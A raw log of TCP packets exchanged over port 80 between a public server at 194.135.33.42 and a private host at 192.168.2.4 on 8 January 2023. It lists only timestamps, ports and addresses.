Jan 8, 2023 16:15:22.917869091 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917896986 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917897940 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917928934 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917957067 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917960882 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917985916 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918004036 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.918015003 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918045044 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918065071 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.918111086 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918139935 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918157101 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.918169022 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918198109 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918220997 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.918227911 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918256998 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918286085 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918293953 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.918314934 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918334007 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.918344975 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918375015 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918400049 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.918404102 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918436050 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918457985 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.918464899 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918488026 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918509007 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918535948 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918556929 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918577909 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918606043 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918634892 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918662071 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918689013 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.918735981 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.918819904 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.919007063 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919039011 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919050932 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.919050932 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.919066906 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919074059 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.919096947 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919117928 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.919126034 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919156075 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919177055 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.919184923 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919214964 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919229031 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.919243097 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919271946 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919286966 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.919300079 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919327974 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919348001 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.919357061 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919385910 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.919411898 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.921771049 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.921807051 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.921835899 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.921865940 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.921870947 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.921895027 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.921906948 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.921924114 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.921952963 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.921952963 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.921981096 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.922005892 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.922009945 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.922039032 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.922065973 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.922071934 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.922095060 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.922116995 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.922123909 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.922153950 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.922174931 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.923486948 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.923816919 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.923850060 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.923877954 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.923906088 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.923909903 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.923934937 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.923943043 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.923991919 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.923993111 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.924021006 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.924048901 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.924072027 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.924109936 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.924122095 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.924146891 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.924149990 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.924180984 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.924223900 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.924248934 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.924278975 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.924299955 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.924308062 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.924338102 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.924355030 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.924555063 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.925529003 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.946425915 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946465969 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946486950 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946506977 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946526051 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946546078 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946564913 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946583986 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946603060 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946623087 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946640968 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946660042 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946679115 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946713924 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946732998 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946751118 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946770906 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946789026 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946809053 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946834087 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946854115 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946873903 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946892977 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946912050 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946930885 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946949959 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946968079 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.946986914 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947005033 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947024107 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947062016 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947072029 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.947083950 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947141886 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947153091 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.947165966 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947185040 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947202921 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947221994 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947290897 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947309971 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947328091 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947362900 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947411060 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947443008 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947464943 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947484016 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947504044 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947557926 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947580099 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947599888 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947618961 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947637081 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947671890 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947706938 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947727919 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947746992 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947782993 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947788000 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.947805882 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947817087 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.947828054 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947866917 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947875023 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.947887897 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947906971 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947907925 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.947926998 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.947951078 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.947988987 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948035955 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948072910 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948095083 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948115110 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948136091 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948187113 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948210001 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948229074 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948235035 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948249102 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948271036 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948281050 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948292017 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948312998 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948334932 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948335886 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948357105 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948365927 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948378086 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948398113 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948407888 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948419094 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948437929 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948452950 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948458910 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948479891 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948487997 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948499918 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948519945 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948523045 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948539972 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948559999 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948565960 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948580980 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948599100 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948601007 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948621988 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948640108 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948642015 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948661089 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948679924 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948681116 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948703051 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948723078 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948726892 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948757887 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948764086 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948795080 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948831081 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948853970 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948858976 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948877096 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948896885 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948906898 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948916912 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948936939 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948940039 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948956966 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.948977947 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.948992968 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949028015 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949037075 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949063063 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949100018 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949129105 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949148893 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949182987 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949188948 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949203968 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949223995 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949242115 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949275970 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949296951 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949316025 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949317932 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949335098 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949354887 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949356079 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949392080 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949398041 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949414015 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949431896 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949450970 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949455976 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949470997 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949496984 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949507952 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949529886 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949548960 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949554920 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949584961 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949588060 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949605942 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949644089 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949656010 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949676037 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949695110 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949713945 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949717999 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949734926 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949754000 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949758053 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949774981 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949790955 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949795008 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949831963 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949847937 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949868917 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949887991 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949906111 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949908972 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949925900 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949948072 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949949026 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949969053 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.949985027 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.949990034 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950012922 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950032949 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950031996 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950054884 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950074911 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950074911 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950095892 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950117111 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950123072 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950138092 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950160027 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950165987 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950181961 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950201988 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950202942 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950223923 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950237036 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950249910 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950270891 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950284004 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950290918 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950311899 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950326920 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950334072 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950356007 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950371027 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950376034 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950407028 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950412035 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950431108 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950450897 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950458050 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950472116 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950490952 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950495958 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950512886 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950534105 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950542927 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950555086 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950576067 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950579882 CET	49698	80	192.168.2.4	194.135.33.42
